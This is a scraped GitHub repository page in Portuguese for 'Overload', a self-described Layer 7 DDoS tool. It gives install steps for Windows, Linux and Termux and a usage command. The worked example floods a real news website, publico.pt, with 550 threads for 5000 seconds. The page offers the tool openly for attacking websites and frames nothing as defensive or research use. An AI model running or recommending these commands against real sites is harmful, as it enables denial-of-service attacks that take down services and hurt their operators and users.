Skip to content

šŸ“” Overload DDOS Tool (Layer 7)

License

Notifications You must be signed in to change notification settings

Varinders0hal/overload

Ā 
Ā 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Ā 
Ā 
Ā 
Ā 
Ā 
Ā 
Ā 
Ā 
Ā 
Ā 
Ā 
Ā 
Ā 

Repository files navigation

šŸ“” DDOS Tool (Layer 7)

šŸ’» Janela Principal

šŸŒ™ InstalaĆ§Ć£o

Windows

  • Instala Python 3.8 aqui
  • Abre o installer e clica em: add python to PATH
  • Faz download do overload aqui
  • Abre o cmd ou o PowerShell no diretĆ³rio overload
  • Execute este comando: pip install -r requirements.txt

Linux

sudo apt update
sudo apt install python3 python3-pip git -y
git clone https://github.com/7zx/overload
cd overload/
pip3 install -r requirements.txt

Termux

pkg update
pkg install python3 python3-pip git -y
git clone https://github.com/7zx/overload
cd overload/
pip3 install -r requirements.txt

ā“ Como Usar

O comando bƔsico para poder executar o overload Ʃ o seguinte.

python3 overload.py --time XXX --threads XXX --target [URL] --method HTTP

Exemplo:

python3 overload.py --time 5000 --threads 550 --target https://www.publico.pt/ --method HTTP

About

šŸ“” Overload DDOS Tool (Layer 7)

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • Python 100.0%